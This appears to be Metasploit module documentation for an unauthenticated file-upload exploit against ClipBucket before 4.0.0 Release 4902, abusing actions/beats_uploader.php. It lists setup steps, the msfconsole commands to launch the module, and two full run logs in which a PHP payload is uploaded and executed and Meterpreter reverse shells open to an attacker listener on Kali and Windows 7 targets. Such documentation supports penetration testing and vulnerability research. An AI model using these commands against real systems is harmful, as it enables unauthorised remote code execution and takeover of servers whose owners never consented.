Vulnerable Application
Description
A malicious file can be uploaded by an unauthenticated attacker through the actions/beats_uploader.php script. ClipBucket < 4.0.0 - Release 4902 is vulnerable. Additional information and vulnerabilities can be viewed on Exploit-DB 44250
Available at Exploit-DB
Installation
Download Application: wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
Unzip: unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip
Move In WebDirectory: mv clipbucket-4881/upload/* /var/www/html/
Change Owner: chown -R www-data:www-data /var/www/html/
Follow Clipbucket Installer Instructions at: http://localhost/
Verification Steps
Install the application
Start msfconsole
Do: use exploit/multi/http/clipbucket_fileupload_exec
Do: set rport <port>
Do: set rhost <ip>
Do: set lport <port>
Do: set lhost <ip>
Do: exploit
You should get a shell.
Options
TARGETURI
TARGETURI by default is /, however it can be changed.
Scenarios
ClipBucket on Kali Linux
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run
[*] Started reverse TCP handler on 10.22.1.4:5050
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php
meterpreter > sysinfo
Computer : linux
OS : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter >
ClipBucket on Windows 7
msf > use exploit/multi/http/clipbucket_fileupload_exec
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.4:4545
[*] Uploading payload..
[+] Looking For Payload ....
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php
meterpreter > sysinfo
Computer : AGENT22-PC
OS : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter >
